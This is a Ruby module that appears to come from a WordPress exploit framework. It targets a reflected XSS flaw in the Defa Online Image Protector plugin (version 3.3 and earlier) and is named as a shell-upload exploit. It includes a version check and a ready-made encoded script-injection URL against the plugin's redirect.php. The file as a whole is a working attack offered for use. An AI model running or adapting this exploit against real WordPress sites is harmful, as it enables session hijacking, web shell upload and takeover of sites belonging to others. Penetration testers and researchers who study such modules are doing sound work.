# frozen_string_literal: true

class Wpxf::Exploit::DefaOnlineImageProtectorReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'Defa Online Image Protector <= 3.3 Reflected XSS Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8454'],
        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=449']
      ],
      date: 'Feb 09 2016'
    )
  end

  def check
    check_plugin_version_from_readme('defa-online-image-protector')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_plugins, 'defa-online-image-protector', 'redirect.php')
  end

  def url_with_xss
    "#{vulnerable_url}?r=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
  end
end
